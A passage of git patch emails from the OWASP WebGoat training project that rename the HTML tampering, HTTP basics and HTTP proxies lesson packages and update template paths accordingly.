 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 

From 25948306bd1230fb152aa3ee730d4dc2cf220143 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:25:59 +0200
Subject: [PATCH 182/227] Renamed to htmltampering

---
 .../HtmlTampering.java                              |   2 +-
 .../HtmlTamperingTask.java                          |   2 +-
 .../documentation/HtmlTampering_Intro.adoc          |   0
 .../documentation/HtmlTampering_Mitigation.adoc     |   0
 .../documentation/HtmlTampering_Task.adoc           |   0
 .../html/HtmlTampering.html                         |   6 +++---
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/samsung.jpg                              | Bin
 8 files changed, 5 insertions(+), 5 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{html_tampering => htmltampering}/HtmlTampering.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{html_tampering => htmltampering}/HtmlTamperingTask.java (97%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/documentation/HtmlTampering_Intro.adoc (100%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/documentation/HtmlTampering_Mitigation.adoc (100%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/documentation/HtmlTampering_Task.adoc (100%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/html/HtmlTampering.html (95%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{html_tampering => htmltampering}/images/samsung.jpg (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java
rename to src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
index bb8ccdc68..6c63c6cc1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.html_tampering;
+package org.owasp.webgoat.lessons.htmltampering;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java
rename to src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
index f552458ed..c34d3c69b 100644
--- a/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.html_tampering;
+package org.owasp.webgoat.lessons.htmltampering;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Intro.adoc b/src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Intro.adoc
similarity index 100%
rename from src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Intro.adoc
rename to src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Intro.adoc
diff --git a/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc b/src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Mitigation.adoc
similarity index 100%
rename from src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc
rename to src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Mitigation.adoc
diff --git a/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Task.adoc b/src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Task.adoc
similarity index 100%
rename from src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Task.adoc
rename to src/main/resources/lessons/htmltampering/documentation/HtmlTampering_Task.adoc
diff --git a/src/main/resources/lessons/html_tampering/html/HtmlTampering.html b/src/main/resources/lessons/htmltampering/html/HtmlTampering.html
similarity index 95%
rename from src/main/resources/lessons/html_tampering/html/HtmlTampering.html
rename to src/main/resources/lessons/htmltampering/html/HtmlTampering.html
index afd3dba68..c40fdd68c 100755
--- a/src/main/resources/lessons/html_tampering/html/HtmlTampering.html
+++ b/src/main/resources/lessons/htmltampering/html/HtmlTampering.html
@@ -3,12 +3,12 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/htmltampering/documentation/HtmlTampering_Intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- stripped down without extra comments -->
-    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Task.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/htmltampering/documentation/HtmlTampering_Task.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" id="task" name="task"
@@ -143,6 +143,6 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/htmltampering/documentation/HtmlTampering_Mitigation.adoc"></div>
 </div>
 </html>
diff --git a/src/main/resources/lessons/html_tampering/i18n/WebGoatLabels.properties b/src/main/resources/lessons/htmltampering/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/html_tampering/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/htmltampering/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/html_tampering/images/samsung.jpg b/src/main/resources/lessons/htmltampering/images/samsung.jpg
similarity index 100%
rename from src/main/resources/lessons/html_tampering/images/samsung.jpg
rename to src/main/resources/lessons/htmltampering/images/samsung.jpg

From 08ce1add01097555820062b9cd491bd0e31038c7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:33:26 +0200
Subject: [PATCH 183/227] Renamed to httpbasics

---
 .../lessons/{http_basics => httpbasics}/HttpBasics.java     | 2 +-
 .../{http_basics => httpbasics}/HttpBasicsLesson.java       | 2 +-
 .../lessons/{http_basics => httpbasics}/HttpBasicsQuiz.java | 2 +-
 .../documentation/HttpBasics_content1.adoc                  | 0
 .../documentation/HttpBasics_content2.adoc                  | 0
 .../documentation/HttpBasics_plan.adoc                      | 0
 .../{http_basics => httpbasics}/html/HttpBasics.html        | 6 +++---
 .../i18n/WebGoatLabels.properties                           | 0
 .../i18n/WebGoatLabels_de.properties                        | 0
 .../i18n/WebGoatLabels_fr.properties                        | 0
 .../i18n/WebGoatLabels_nl.properties                        | 0
 .../i18n/WebGoatLabels_ru.properties                        | 0
 12 files changed, 6 insertions(+), 6 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{http_basics => httpbasics}/HttpBasics.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{http_basics => httpbasics}/HttpBasicsLesson.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{http_basics => httpbasics}/HttpBasicsQuiz.java (98%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/documentation/HttpBasics_content1.adoc (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/documentation/HttpBasics_content2.adoc (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/documentation/HttpBasics_plan.adoc (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/html/HttpBasics.html (92%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/i18n/WebGoatLabels_de.properties (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/i18n/WebGoatLabels_fr.properties (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/i18n/WebGoatLabels_nl.properties (100%)
 rename src/main/resources/lessons/{http_basics => httpbasics}/i18n/WebGoatLabels_ru.properties (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java
rename to src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
index 6fa81d761..eaecf1839 100644
--- a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.http_basics;
+package org.owasp.webgoat.lessons.httpbasics;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
index 8906ddb41..af7e80416 100644
--- a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.http_basics;
+package org.owasp.webgoat.lessons.httpbasics;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
index 5fea07748..ae9bcebce 100644
--- a/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.http_basics;
+package org.owasp.webgoat.lessons.httpbasics;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/resources/lessons/http_basics/documentation/HttpBasics_content1.adoc b/src/main/resources/lessons/httpbasics/documentation/HttpBasics_content1.adoc
similarity index 100%
rename from src/main/resources/lessons/http_basics/documentation/HttpBasics_content1.adoc
rename to src/main/resources/lessons/httpbasics/documentation/HttpBasics_content1.adoc
diff --git a/src/main/resources/lessons/http_basics/documentation/HttpBasics_content2.adoc b/src/main/resources/lessons/httpbasics/documentation/HttpBasics_content2.adoc
similarity index 100%
rename from src/main/resources/lessons/http_basics/documentation/HttpBasics_content2.adoc
rename to src/main/resources/lessons/httpbasics/documentation/HttpBasics_content2.adoc
diff --git a/src/main/resources/lessons/http_basics/documentation/HttpBasics_plan.adoc b/src/main/resources/lessons/httpbasics/documentation/HttpBasics_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/http_basics/documentation/HttpBasics_plan.adoc
rename to src/main/resources/lessons/httpbasics/documentation/HttpBasics_plan.adoc
diff --git a/src/main/resources/lessons/http_basics/html/HttpBasics.html b/src/main/resources/lessons/httpbasics/html/HttpBasics.html
similarity index 92%
rename from src/main/resources/lessons/http_basics/html/HttpBasics.html
rename to src/main/resources/lessons/httpbasics/html/HttpBasics.html
index 860f18f2d..e3dcc79c0 100644
--- a/src/main/resources/lessons/http_basics/html/HttpBasics.html
+++ b/src/main/resources/lessons/httpbasics/html/HttpBasics.html
@@ -6,13 +6,13 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
 		which you put in src/main/resources/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_plan.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/httpbasics/documentation/HttpBasics_plan.adoc"></div>
 	</div>
 
 	<div class="lesson-page-wrapper">
 		<!-- reuse this block for each 'page' of content -->
         <!-- sample ascii doc content for second page -->
-		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_content1.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/httpbasics/documentation/HttpBasics_content1.adoc"></div>
         <!-- if including attack, reuse this section, leave classes in place -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -42,7 +42,7 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_content2.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/httpbasics/documentation/HttpBasics_content2.adoc"></div>
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
diff --git a/src/main/resources/lessons/http_basics/i18n/WebGoatLabels.properties b/src/main/resources/lessons/httpbasics/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/http_basics/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/httpbasics/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_de.properties b/src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_de.properties
similarity index 100%
rename from src/main/resources/lessons/http_basics/i18n/WebGoatLabels_de.properties
rename to src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_de.properties
diff --git a/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_fr.properties b/src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_fr.properties
similarity index 100%
rename from src/main/resources/lessons/http_basics/i18n/WebGoatLabels_fr.properties
rename to src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_fr.properties
diff --git a/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_nl.properties b/src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_nl.properties
similarity index 100%
rename from src/main/resources/lessons/http_basics/i18n/WebGoatLabels_nl.properties
rename to src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_nl.properties
diff --git a/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_ru.properties b/src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_ru.properties
similarity index 100%
rename from src/main/resources/lessons/http_basics/i18n/WebGoatLabels_ru.properties
rename to src/main/resources/lessons/httpbasics/i18n/WebGoatLabels_ru.properties

From 1eff81718bba63b1cd8fa74982bf536c91b1b5e6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:38:04 +0200
Subject: [PATCH 184/227] Renamed to httpproxies

---
 .../HttpBasicsInterceptRequest.java           |   2 +-
 .../HttpProxies.java                          |   2 +-
 .../documentation/0overview.adoc              |   0
 .../documentation/10burp.adoc                 |   0
 .../documentation/1proxysetupsteps.adoc       |   0
 .../documentation/3browsersetup.adoc          |   0
 .../5configurefilterandbreakpoints.adoc       |   0
 .../documentation/6assignment.adoc            |   0
 .../documentation/7resend.adoc                |   0
 .../documentation/8httpsproxy.adoc            |   0
 .../documentation/9manual.adoc                |   0
 .../html/HttpProxies.html                     |  18 +++++++++---------
 .../i18n/WebGoatLabels.properties             |   0
 .../images/breakpoint.png                     | Bin
 .../images/breakpoint2.png                    | Bin
 .../images/burpfilter.png                     | Bin
 .../images/burpfilterclient.png               | Bin
 .../images/burpintercept.png                  | Bin
 .../images/burpintercepted.png                | Bin
 .../images/burpproxy.png                      | Bin
 .../images/burpwarn.png                       | Bin
 .../images/chrome-manual-proxy-win.png        | Bin
 .../images/chrome-manual-proxy.png            | Bin
 .../images/firefox-proxy-config.png           | Bin
 .../images/firefoxsettingscerts.png           | Bin
 .../images/importcerts.png                    | Bin
 .../images/loginscreen.png                    | Bin
 .../images/newlocalhost.png                   | Bin
 .../images/proxy-intercept-button.png         | Bin
 .../images/proxy-intercept-details.png        | Bin
 .../images/rootca.png                         | Bin
 .../images/savecerts.png                      | Bin
 .../images/zap-browser-button.png             | Bin
 .../images/zap-exclude.png                    | Bin
 .../images/zap-history.png                    | Bin
 .../images/zap-start.png                      | Bin
 .../images/zap_edit_and_resend.png            | Bin
 .../images/zap_edit_and_response.png          | Bin
 .../images/zap_edit_and_send.png              | Bin
 .../images/zap_exclude.png                    | Bin
 .../images/zap_exclude_url.png                | Bin
 .../HttpBasicsInterceptRequestTest.java       |   4 ++--
 42 files changed, 13 insertions(+), 13 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{http_proxies => httpproxies}/HttpBasicsInterceptRequest.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{http_proxies => httpproxies}/HttpProxies.java (97%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/0overview.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/10burp.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/1proxysetupsteps.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/3browsersetup.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/5configurefilterandbreakpoints.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/6assignment.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/7resend.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/8httpsproxy.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/documentation/9manual.adoc (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/html/HttpProxies.html (52%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/breakpoint.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/breakpoint2.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpfilter.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpfilterclient.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpintercept.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpintercepted.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpproxy.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/burpwarn.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/chrome-manual-proxy-win.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/chrome-manual-proxy.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/firefox-proxy-config.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/firefoxsettingscerts.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/importcerts.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/loginscreen.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/newlocalhost.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/proxy-intercept-button.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/proxy-intercept-details.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/rootca.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/savecerts.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap-browser-button.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap-exclude.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap-history.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap-start.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap_edit_and_resend.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap_edit_and_response.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap_edit_and_send.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap_exclude.png (100%)
 rename src/main/resources/lessons/{http_proxies => httpproxies}/images/zap_exclude_url.png (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{http_proxies => httpproxies}/HttpBasicsInterceptRequestTest.java (97%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java
rename to src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
index aac759c27..0550018a7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.http_proxies;
+package org.owasp.webgoat.lessons.httpproxies;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java
rename to src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
index b0f9e31cb..a111e1223 100644
--- a/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.http_proxies;
+package org.owasp.webgoat.lessons.httpproxies;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/resources/lessons/http_proxies/documentation/0overview.adoc b/src/main/resources/lessons/httpproxies/documentation/0overview.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/0overview.adoc
rename to src/main/resources/lessons/httpproxies/documentation/0overview.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/10burp.adoc b/src/main/resources/lessons/httpproxies/documentation/10burp.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/10burp.adoc
rename to src/main/resources/lessons/httpproxies/documentation/10burp.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/1proxysetupsteps.adoc b/src/main/resources/lessons/httpproxies/documentation/1proxysetupsteps.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/1proxysetupsteps.adoc
rename to src/main/resources/lessons/httpproxies/documentation/1proxysetupsteps.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/3browsersetup.adoc b/src/main/resources/lessons/httpproxies/documentation/3browsersetup.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/3browsersetup.adoc
rename to src/main/resources/lessons/httpproxies/documentation/3browsersetup.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc b/src/main/resources/lessons/httpproxies/documentation/5configurefilterandbreakpoints.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc
rename to src/main/resources/lessons/httpproxies/documentation/5configurefilterandbreakpoints.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/6assignment.adoc b/src/main/resources/lessons/httpproxies/documentation/6assignment.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/6assignment.adoc
rename to src/main/resources/lessons/httpproxies/documentation/6assignment.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/7resend.adoc b/src/main/resources/lessons/httpproxies/documentation/7resend.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/7resend.adoc
rename to src/main/resources/lessons/httpproxies/documentation/7resend.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/8httpsproxy.adoc b/src/main/resources/lessons/httpproxies/documentation/8httpsproxy.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/8httpsproxy.adoc
rename to src/main/resources/lessons/httpproxies/documentation/8httpsproxy.adoc
diff --git a/src/main/resources/lessons/http_proxies/documentation/9manual.adoc b/src/main/resources/lessons/httpproxies/documentation/9manual.adoc
similarity index 100%
rename from src/main/resources/lessons/http_proxies/documentation/9manual.adoc
rename to src/main/resources/lessons/httpproxies/documentation/9manual.adoc
diff --git a/src/main/resources/lessons/http_proxies/html/HttpProxies.html b/src/main/resources/lessons/httpproxies/html/HttpProxies.html
similarity index 52%
rename from src/main/resources/lessons/http_proxies/html/HttpProxies.html
rename to src/main/resources/lessons/httpproxies/html/HttpProxies.html
index f916785db..3b96be434 100644
--- a/src/main/resources/lessons/http_proxies/html/HttpProxies.html
+++ b/src/main/resources/lessons/httpproxies/html/HttpProxies.html
@@ -3,23 +3,23 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/0overview.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/0overview.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/1proxysetupsteps.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/1proxysetupsteps.adoc"></div>
 	</div>
 
     <div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/3browsersetup.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/3browsersetup.adoc"></div>
 	</div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/5configurefilterandbreakpoints.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/6assignment.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/6assignment.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <form class="attack-form" accept-charset="UNKNOWN" name="intercept-request"
@@ -36,15 +36,15 @@
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/7resend.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/7resend.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/8httpsproxy.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/8httpsproxy.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/9manual.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/9manual.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/10burp.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/httpproxies/documentation/10burp.adoc"></div>
     </div>
 </html>
diff --git a/src/main/resources/lessons/http_proxies/i18n/WebGoatLabels.properties b/src/main/resources/lessons/httpproxies/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/http_proxies/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/httpproxies/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/http_proxies/images/breakpoint.png b/src/main/resources/lessons/httpproxies/images/breakpoint.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/breakpoint.png
rename to src/main/resources/lessons/httpproxies/images/breakpoint.png
diff --git a/src/main/resources/lessons/http_proxies/images/breakpoint2.png b/src/main/resources/lessons/httpproxies/images/breakpoint2.png
similarity index 100%
